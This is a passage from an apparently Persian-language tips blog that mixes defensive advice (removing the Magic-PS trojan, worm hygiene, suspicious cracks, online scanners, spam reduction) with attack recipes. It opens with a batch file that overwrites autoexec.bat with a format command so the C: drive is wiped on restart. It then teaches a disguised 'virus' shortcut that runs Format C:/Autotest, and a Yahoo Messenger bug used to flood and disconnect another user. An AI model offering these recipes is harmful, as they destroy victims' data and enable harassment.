call attrib +r +h c:autoexec.bat > nul
exit

 

حال از منوی File بر روی Save as کلیک کنید.

از منوی کشویی Save as type گزینه All Files را برگزینید.

در قسمت File Name عبارت txt.* را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و

پسوند bat. را به انتهای آن اضافه کنید ، به طور مثال tarfandestan.bat

سپس مکان مورد نظر برای ذخیره فایل را مشخص کرده و روی دکمه Save کلیک کنید.

اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart

شود تا فایل فعال شود.

اما به چند نکته توجه کنید:

عبارتی که شما کپی کردید برای فرمت درایو C میباشد ، برای تعویض آن کافی است در

خطوط 2 و 3 و 4 و 5 در جایی که نوشته است :c به جای c نام درایو مورد نظر را بنویسید.

دقت هم کنید که ابدأ به روی فایلی که ساخته اید کلیک نکنید ، چرا که آن وقت باید با درایو

خودتون خداحافظی کنید!

اما به نظر شما این فایل چگونه کار میکند؟

روش کار این فایل بدین شکل است که ابتدا محتویات فایل autoexe.bat که یک فایل ویندوزی

است را پاک میکند و سپس کد ' format /autotest c:/q ' را در داخلش جایگزین میکنه ، به

همین سبب پس از رستارت کامپیوتر درایو شما فرمت میشود.

 

 

ساخت یک ویروس ( تروجان ) ساده ولی خطرناک

 

ميخوام نوشتن يه ويروس ساده ولي خطرناك رو بهتون ياد بدم. اين ويروس چيز سختي

نيست ولی خيلي خطرناكه و باعث میشه تنها با یک کلیک کل اطلاعات درايو مورد نظر پاک

بشه.

اول از همه روي دسكتاپ رايت كليك كنيد بعدش New ShortCut بسازيد. يه صفحه باز ميشه

در اون بنويسيد: Format C:/Autotest سپس Next را زده و در صفحه جديد كه باز ميشه يه

اسم واسه ويروستون انتخاب كنيد.

سپس Next را زده ويه آيكون با سليقه خودتون براي اون انتخاب كرده و Finish كنيد. خب ديگه

كارمون تمومه حالا اگه اجراش كنين بيچاره ميشين. اگه خواستين بفهمين چي ميشه به جاي

Format C:/autotest بنويسيد Format a:/autotest و يه فلاپي كه حاوي اطلاعات هستش

در Flopy Drive خود قرار دهيد بعد اجراش كنيد بعد برين سراغ فلاپيتون ببينيد چي

شده.ميبينيد فلاپي پاك شده وديگه نه ميشه اطلاعات روش ريخت ونه ميشه فرمتش كرد

 

راهی ساده برای مقابله با تروجان Magic-PS

 

مطمئنأ اکثر کسانی که با مقوله هک و امنیت آشنا هستند نام تروجان معروف Magic-PS را

شنیده اند. این تروجان موجب دزدیده شدن پسورد کاربران پس از اجرا میشود و میتواند به

سادگی پسورد یاهو شما را برای تروجان ساز ارسال کند. در این ترفند قصد داریم روشی را به

شما معرفی کنیم که با بهره گیری از آن میتوانید کار این تروجان را کاملا ساقط کنید و خیال

خود را از هک شدن بدین وسیله راحت کنید.

بدین منظور:

از منوی Start وارد Run شده و در آن عبارت regedit را وارد کرده و Enter بزنید تا رجیستری

باز شود.

سپس به آدرس زیر بروید:

HKEY_CURRENT_USER/Softwaqre/microsoft/windows/current version/Runonce

سپس از قسمت دیگر دنبال متغیری با نام SVCHOST یا svchost بگردید و اگر وجود داشت آن

را پاک کنید.

همین عمل را در آدرس زیر نیز اعمال کنید:

HKEY_LOCAL_MACHIN/software/microsoft/windows/curren version/run

در پایان سیستم را مجددأ راه اندازی کنید.

 

 

خصوصيات کرمهای شرور

 

كرمها اصولاً ويروس نيستند با اين وجود تفاوت بين آنها بسيار اندك است و معمولاً در اخبار

روزمره آنها را با يكديگر اشتباه مي گيرند. ويروسها يك كامپيوتر منفرد را آلوده مي كنند و

سعي نمي كنند به كامپيوتر ديگري راه پيدا كنند اما کرمها بسیار شرور ترند چرا که سعی

میکنند به کامپیوترهای دیگر انتقال پیدا کنند. ( مثلاً با اشتراك گذاشتن فايلها بوسيله email يا

بوسيله فلاپي ديسك ها). كرمها به شدت علاقه مندند كه فقط خود را در ميان يك شبكه

گسترش دهند. آنها به طور خود كار خودشان را به كامپيوترهاي ديگر انتقال مي دهند به علت

اينكه انتقال آنها بين كامپيوترها به طور خودكار انجام مي پذيرد سرعت گسترش آنها بسيار

سريعتر از ويروسها است. اما همیشه ما زرنگ تر بوده ایم. در این ترفند قصد داریم راه هایی

را به شما معرفی کنیم که میتوانید از ورود کرم ها به سیستم تان جلوگیری کنید.

 

معمولترين راه گسترش يك كرم اين است كه خود را به همه آدرسهاي email اي كه شما در

address book خود ليست كرده ايد برساند ، يا outlook شركت مايكروسافت برنامه email اي

است كه بيشترين آسيب پذيري را در برابر حمله كرمها دارد ، فقط به اين دليل كه عمومي

ترين برنامه است. براي كاهش دادن احتمال آلوده شدن به كرمها شما مي توانيد مراحل زير را

اجرا كنيد:

·         هيچ فايل الصاقي ( attachment ) غير منتظره اي را در email هاي خود باز نكنيد

( بخصوص آنهايي را كه شامل پيغامهاي معمول مانند در اين جا فايلي كه شما

درخواست كرده ايد وجود دارد. ) هر چند آنها از منابع مطمئني براي شما ارسال شده

باشند. براي فرستنده email اي بفرستيد (reply ) و از او سئوال كنيد او واقعاً چنين

فايلي براي شما فرستاده است يا نه؟

·         يك آنتي ويروس نصب كنيد و آن را مرتباً up to date كنيد.

·         اگر ممكن است از نرم افزار email اي به غير از Outlook Express استفاده كنيد.

 

اولین نمونه های كرمي كه به خوبي منتشر شده "Love Letter" نام دارد كه با فرستادن خود

به آدرس email اي كه در address book نرم افزار Outlook Express وجود دارند منتشر مي

شود به راحتي كپي كردن فايل در كامپيوتر قرباني خود را وارد مي كند و با يك عنوان به

صورت "I LOVE YOU" وارد مي شود و پيغام آن به صورت زير است :

"Rindly chek the attached LOVE LETTER coming from me"

بدليل اينكه email از يك فرد شناخته شده براي گيرنده ارسال شده است بسياري از مردم

گول مي خورند و كرم در حجم وسيع گسترش پيدا مي كند. اگر چه به كامپيوتر قرباني آسيب

وارد مي شود ولي آسيب اصلي به كل شبكه وارد مي شود و همه آن را آلوده مي كند.

اسب تراوا چيز جالبي بنظر مي رسد اما چيزهاي آسيب رسان و كثيفي در بر دارد. و در لباس

خدمات مفيد يا پيوستهاي ( attachments ) جذاب در email مثلاً يك screen saver پخش مي

شود. آنها فايلهي الصاقي براي شما مي فرستند كه آنقدر براي شما جالب است كه آنها را

براي دوستانتان مي فرستيد. در حاليكه آثار مخرب آن پنهان بوده با تأخير عمل مي كند بنابراين

شما نمي دانيد چيزي كه در حال فرستادن آن هستيد يك فايل خطرناك است.

در مواقع ديگر اين كرمها تكثير مي شوند مانند يك كرم اينترنتي و خود را به صورت اتوماتيك به

كامپيوترهاي ديگر مي رسانند و معمولاً از Outlook Express استفاده مي كنند.

 

چگونگی دریافت کرک ها و تشخیص ویروسی بودن آنها

 

ممکن است شما نیز تا به حال در جستجوی کرک برنامه ها و بازی ها بوده اید ، اما متاسفانه

سایتهای بسیاری وجود دارد که از این نكته برای فریب کاربران استفاده میکنند و برنامه های

آلوده به ویروس خود را به جای کرک های برنامه ها به مردم تحویل میدهند. در این ترفند قصد

داریم روشهای مفیدی را معرفی کنیم که میتوانید این کرکهای آلوده را که حتی بسیاری از

آنتی ویروس ها در تشخیص آنها ناکام هستند ، خودتان تشخیص دهید.

 

برای استفاده از کرک این سایتها باید به موارد زیر توجه کرد:

1-حتما قبل از باز کردن فایل آنرا با Antivirus خود چک کنید. (ترجیحا Kaspersky ) توجه

داشته باشید که آنتی ویروستان داخل فایلهای فشرده مثل zip، rar و ... و نیز فایلهای Exe

selfextract را باید چک کند.

2-دستورالعمل داخل فایل *.nfo را بخوانید(به جای * نام فایلتان است!) فایلهای مورد نیاز (که

غالب اوقات ویروسی نیستند) در آن ذکر شده است. بنابراین فایلهای دیگر را هر گز اجرا نکنید.

(این فایل را باید با notepad یا نرم افزارهای مشابه آن باز کرد)

 

3-فایلهایی با نامهای crack.exe، run.exe، NiTROUS.exe و... غالبا ویروسی هستند. سعی

کنید آنها را تا مطمئن نشدید (مثلا از طریق آنتی ویروس) اجرا نکنید. توصیه می کنم آنها را

بلافاصله پاک کنید

 

 

چک کردن سیستم از وجود ویروس به شکل آنلاین از طریق اینترنت

 

یکی از مشکلاتی که کاربران به ویژه کاربران ایرانی دارند استفاده از آنتی ویروس ها برای

اسکن کردن سیستم خود از وجود ویروس است. مشکلاتی از قبیل حجم زیاد نرم افزارهای

آنتی ویروس ، نیاز به کرک کردن برای استفاده کامل و ... . در این ترفند قصد داریم چندین

سرویس آنلاین را به شما معرفی کنیم که با بهره گیری از آنها میتوانید بدون نیاز به نرم افزار

آنتی ویروس خاصی ، سیستم خود را از طریق اینترنت و به شکلی کاملأ رایگان اسکن کنید.

برای استفاده از این سرویس ها ، کافی است به سایتهای زیر رفته و از قابلیتهای موجود

استفاده کنید:

Symantec Security Check

McAfee FreeScan

Panda ActiveScan

Kaspersky lab

Bitdefender

RAV

Tarfandestan

Trend Micro

SYGATE

AuditMyPc

Shields UP!!

VIRUS SCANNERS ON-LINE

Free Antivirus Removal Tools

 

 

 

ترفندهایی برای کاهش Spam

 

اسپم به زبان ساده ایمیلهای ناخواسته ای است که معمولا به صورت انبوه برای شما ارسال

میشوند.اسپمها يکی از متداولترين و در عين حال منفی ترين جنبه های دارا بودن يک آدرس

Email است . با اين که در حال حاضر و با توجه به تکنولوژی های موجود امکان حذف کامل اين

نوع از نامه های الکترونيکی ناخواسته وجود ندارد ، ولی قصد داریم ترفندهایی را به شما

معرفی کنیم که با استفاده از آنها می توانید تعداد آنها را کاهش دهید .

Spam يکی از متداولترين و در عين حال منفی ترين جنبه های دارا بودن يک آدرس Email

است . با اين که در حال حاضر و با توجه به تکنولوژی های موجود امکان حذف کامل اين نوع از

نامه های الکترونيکی ناخواسته وجود ندارد ، ولی می توان با استفاده از برخی روش های

موجود تعداد آنان را کاهش داد .

Spam ، نسخه الکترونيکی از " نامه های بدرد نخور " است . واژه Spam به پيام های

الکترونيکی ناخواسته ، اطلاق می گردد . اين نوع از نامه های الکترونيکی ارتباط مستقيمی با

ويروس نداشته و حتی ممکن است پيام هائی که از منابع معتبر ارسال شده اند نيز در زمره

اين گروه قرار گيرند .

چگونه می توان ميزان Spam را کاهش داد ؟

با رعايت برخی نکات ، می توان ميزان Spam دريافتی را بطرز محسوسی کاهش داد :

آدرس Email خود را بدون دليل در اختيار ديگران قرار ندهيد . آدرس های پست الکترونيکی به

اندازه ای متداول شده اند که شما می توانيد بر روی هر فرمی که به منظور کسب اطلاعات

شما در نظر گرفته می شود ، وجود فيلد خاصی به منظور دريافت آدرس Email را مشاهد

نمائيد . تعدادی زيادی از مردم بدون درنظر گرفتن مسائل جانبی ، آدرس Email خود را در هر

محلی و يا هر فرمی درج می نمايند . مثلا" شرکت ها ، اغلب آدرس ها را در يک بانک اطلاعاتی

ثبت تا بتوانند وضعيت مشتيريان خود را در آينده دنبال نمايند . برخی اوقات ، اطلاعات فوق به

ساير شرکت ها فروخته شده و يا امکان استفاده مشترک برای آنان ، فراهم می گردد . بديهی

است در چنين مواردی ممکن است برای شما يک Email و از طرف شرکتی ارسال شود که نه

توقع آن را داشته ايد و نه از آنان درخواستی مبنی بر ارائه اطلاعات خاصی را داشته ايد.

بررسی سياست های محرمانگی . قبل از ارسال آدرس Email خود به صورت online ، بدنبال

Privacy سايت مورد نظر بگرديد .تعداد بسيار زيادی از سايت های شناخته شده و خوشنام

دارای يک لينک خاص بر روی سايت خود به منظور آشنائی کاربران با سياست های آن سايت

در خصوص نحوه برخورد با اطلاعات ارسالی شما می باشند . (همواره اين پرسش را برای

خود مطرح نمائيد که آيا ما آدرسEmail خود را در سايت هائی درج می نمائيم که نسبت به آنان

شناخت کافی داريم ؟) . شما می بايست قبل از ارسال آدرس Email خود و يا ساير اطلاعات

شخصی ، سياست های اعلام شده توسط سايت مورد نظر را مطالعه نموده و از اين موضوع

آگاه شويد که مالکين و يا مسئولين سايت قصد انجام چه کاری را با اطلاعات ارسالی شما

دارند.

دقت لازم در خصوص گزينه هائی که به صورت پيش فرض فعال شده اند . زمانی که شما

برای دريافت خدمات و يا Account جديد عمليات sign in را انجام می دهيد ، ممکن است

بخشی وجود داشته باشد که به شما مجموعه ای از گزينه ها را در خصوص دريافت email در

خصوص محصولات و يا سرويس های جديد ، ارائه نمايد . در برخی مواقع ، گزينه ها به صورت

پيش فرض انتخاب شده اند ، بنابراين در صورتی که شما آنان را به همان وضعيت باقی بگذاريد

، در آينده نه چندان دور برای شما حجم زيادی از نامه های الکترونيکی که شايد انتظار آنان را

نداشته باشد ، ارسال گردد .

استفاده از فيلترها : تعدادی زيادی از برنامه های پست الکترونيکی امکان فيلترينگ را ارائه

می نمايند . پتانسيل فوق به شما اين اجازه را خواهد داد که آدرس های خاصی را بلاک نموده

و يا امکان دريافت نامه را صرفا" از طريق ليست تماس موجود بر روی کامپيوتر خود ، داشته

باشيد. برخی مراکز ارائه دهنده خدمات اينترنت ( ISP ) نيز سرويس فيلترينگ و علامت گذاری

مربوط به مقابله با Spam را ارائه می نمايند . در چنين مواردی ممکن است پيام های معتبری

که بدرستی طبقه بندی نشده باشند به عنوان spam درنظر گرفته شده و هرگز به صندوق

پستی شما ارسال نگردند .

هرگز برروی لينک های موجود در يک Spam ، کليک ننمائيد . برخی از منابع ارسال کننده Spam

با ارسال آدرس های Email متغير در يک Domain خاص ، سعی در تشخيص معتبر بودن يک

آدرس Email می نمايند. ( مثلا" تشخيص آدرس های Email معتبر موجود بر روی hotmail و يا

yahoo ) .در صورتی که شما بر روی يک لينک ارسالی توسط يک Spam کليک نمائيد ، صرفا"

معتبر بودن آدرس Email خود را به اطلاع آنان رسانده ايد . پيام های ناخواسته ای که يک گزينه

"عدم عضويت " وسوسه انگيز را در اختيار شما قرارمی دهند ، اغلب به عنوان روشی به

منظور جمع آوری آدرس های Email معتبر مورد استفاده قرار گرفته که در آينده از آنان به

منظور ارسال Spam استفاده گردد .

غيرفعال نمودن گزينه دريافت اتوماتيک گرافيک در نامه های الکترونيکی با فرمت HTML . تعداد

زيادی از شرکت ها ، نامه های الکترونيکی را با فرمت HTML و همراه با يک فايل گرافيکی

لينک شده ارسال نموده که در ادامه از آن به منظور رديابی فردی که پيام الکترونيکی را باز

نموده است ، استفاده می نمايند . زمانی که برنامه سرويس گيرنده پست الکترونيکی شما ،

اقدام به download گرافيک از سرويس دهنده آنان می نمايد ، آنان می دانند که شما پيام

الکترونيکی را باز نموده ايد . با غير فعال نمودن HTML mail و مشاهده پيام ها با فرمت صرفا"

متن ، می توان پيشگيری لازم در خصوص اين مسئله را انجام داد .

ايجاد و يا بازنمودن Account های جديد اضافی : تعداد زيادی از سايت ها ، اقدام به عرضه

آدرس پست الکترونيکی به صورت رايگان می نمايند . در صورتی که شما بطور مداوم اقدام به

ارسال آدرسEmail خود می نمائيد ( برای خريد online ، دريافت سرويس و ... ) ، ممکن است

مجبور به ايجاد يک account ديگر به منظور حفاظت آدرس account اوليه خود در مقابل spam

شويد . شما همچنين می بايست از يک account ديگر در زمانی که اطلاعاتی را بر روی بولتن

های خبری online ، اطاق های چت ، ليست های عمومی Mailing و يا USENET ارسال می

نمائيد، استفاده نمائيد . بدين تريتب می توان يک سطح حفاظتی مناسب در خصوص دريافت

spam به آدرس Email اوليه خود را ايجاد کرد.

برای سايرين Spam ارسال ننمائيد . يک کاربر متعهد و دلسوز باشيد . در خصوص پيام هائی که

قصد فوروارد نمودن آنان را داريد ، سختگيرانه عمل کنيد هرگز هرگونه پيامی را برای هر

شخص موجود در ليست دفترجه آدرس خود فوروارد نکرده و اگر فردی از شما بخواهد که

پيامی را برای وی فوروارد ننمائيد ، به درخواست وی احترام بگذاريد .

 

یک روش جدید برای بوت کردن ID در یاهو ، بدون نیاز به نرم افزار

 

در این ترفند قصد داریم به معرفی یک روش جدید بپردازیم که با استفاده از آن میتوانید از یک

باگ موجود در ورژن 7 یاهو مسنجر استفاده کنید و ID طرف مقابل خودتان را بوت کنید. بدون

نیاز به هیچ نرم افزار بوتری و تنها ار طریق فشردن چند کلید در یاهو مسنجر!

بدین منظور کافی است:

پنجره PM چت شخص مورد نظر را باز کنید.

سپس کافی است سه کلید Ctrl+Shift+R را به هر تعدادی که میخواهید فشار دهید. با هر بار

فشردن این 3 کلید یک پنجره PM برای طرف مقابل باز میشود که طبعأ با فشردن متمادی این

3 دکمه شخص بوت میشود! مثلا اگر شما 20 بار این کار را بکنید 20 پنجره PM برای فرد باز

میشود.

دیدن پیام You have requested contact details from نشان دهنده باز شدن یک پنجره برای

شخص مقابل است.

 

هرگز بوت نشويد!

 

با استفاده از ترفندی که به شما آموزش میدهیم میتوانید کاری کنید که بدون نیاز به نرم افزار

خاصی هرگز در یاهو مسنجر بوت نشوید و بتوانید با خیال راحت چت کنید.

برای این کار میبایست کدهايي که شمارو بوت مي کنن فيلتر کنيد.

براي اين کار به شاخه Program Files/Yahoo!Messenger/filter1.txt برويد و فايل filter1.txt

را باز کنيد و کد مقابل وارد کنيد ,url,onLoad=, که در بعضي سيستم ها بايد با يک , و يک

فاصله بعد از اين کارکتر اين کار رو بکنيد ! با اين کار شما بوتر هارو غير فعال مي کنيد.

 

لينک نوشته شده در ساعت توسط ***************M.J.R******************** |